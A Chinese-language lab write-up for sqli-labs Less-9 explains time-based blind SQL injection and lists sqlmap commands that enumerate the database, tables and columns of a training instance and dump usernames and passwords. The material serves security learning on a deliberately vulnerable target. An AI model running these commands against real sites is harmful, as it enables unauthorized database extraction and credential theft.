web——sqliabs靶场——第九关——时间盲注

什么是时间盲注

时间盲注是指基于时间的盲注,也叫延时注入,根据页面的响应时间来判断是否存在注入。

使用sqlmap不同的技术

sqlmap --technique 参数用来设置具体SQL注入技术

B: Boolean-based blind 基于布尔的忙逐步

E:Error-based 报错注入

U:Union query-based Union查询注入

S:Stacked queries 堆叠注入

T:Time-based blind 基于时间的盲注

Q:lnline queries 内联查询注入

例如:

sqlmap -u "存在注入点的URL" --technique B --current-db #利用基于布尔的盲注对注入点进行SQL注入探测。

原文链接:https://blog.csdn.net/qq_49091880/article/details/122301562

使用时间盲注的脚本

1.爆数据库

sqlmap -u "http://657b6c58-8aff-4835-a748-0dca79329577.node5.buuoj.cn/Less-9/?id=1" --technique=T --current-db --batch

batch是强制执行所有选择Y

2.爆破表名

sqlmap -u "http://657b6c58-8aff-4835-a748-0dca79329577.node5.buuoj.cn/Less-9/?id=1" --technique=T -D security --tables --batch

3.爆破列名

时间太慢了,sqlmap可以调整回显时间,

sqlmap -u "http://657b6c58-8aff-4835-a748-0dca79329577.node5.buuoj.cn/Less-9/?id=1" --technique=T -D security -T users --columns --time-sec=1 --batch

--time-sec=1:回显时间为1

4. 爆破列里的数据

sqlmap -u "http://657b6c58-8aff-4835-a748-0dca79329577.node5.buuoj.cn/Less-9/?id=1" --technique=T -D security -T users -C password --dump --time-sec=1 --batch

sqlmap -u "http://657b6c58-8aff-4835-a748-0dca79329577.node5.buuoj.cn/Less-9/?id=1" --technique=T -D security -T users -C username --dump --time-sec=1 --batch

时间盲注缺点:用时比较长。

相关推荐
锋行天下8 小时前
半秒开!还有谁!!!
前端·vue.js·架构
代码搬运媛9 小时前
git 下中文文件名乱码问题解决
前端
CaffeinePro9 小时前
告别知识点零散!React零基础通关,从环境搭建到Ant Design页面实战
前端·react.js
cidy_989 小时前
水龙头领不到测试币?手把手用 Hardhat 本地环境零门槛学以太坊交易
前端
因_崔斯汀9 小时前
Three.js 3D 地图特效与材质实现指南
前端
angerdream10 小时前
手把手编写儿童手机远程监控App之vue3用 AI Agent生成菜单
前端
cidy_9810 小时前
Git Pull 代码冲突后完整回退教程
前端
JING小白10 小时前
Day 1 重学Vue:响应式系统的“底层逻辑”变更,Vue2旧时代的终结与Vue3新时代的开启
前端·vue.js
张就是我10659210 小时前
一个 ZIP 文件,把 webshell 写到了不该在的地方
前端
张就是我10659210 小时前
SPIP 的一个漏洞:你以为过滤了,其实没过滤干净
前端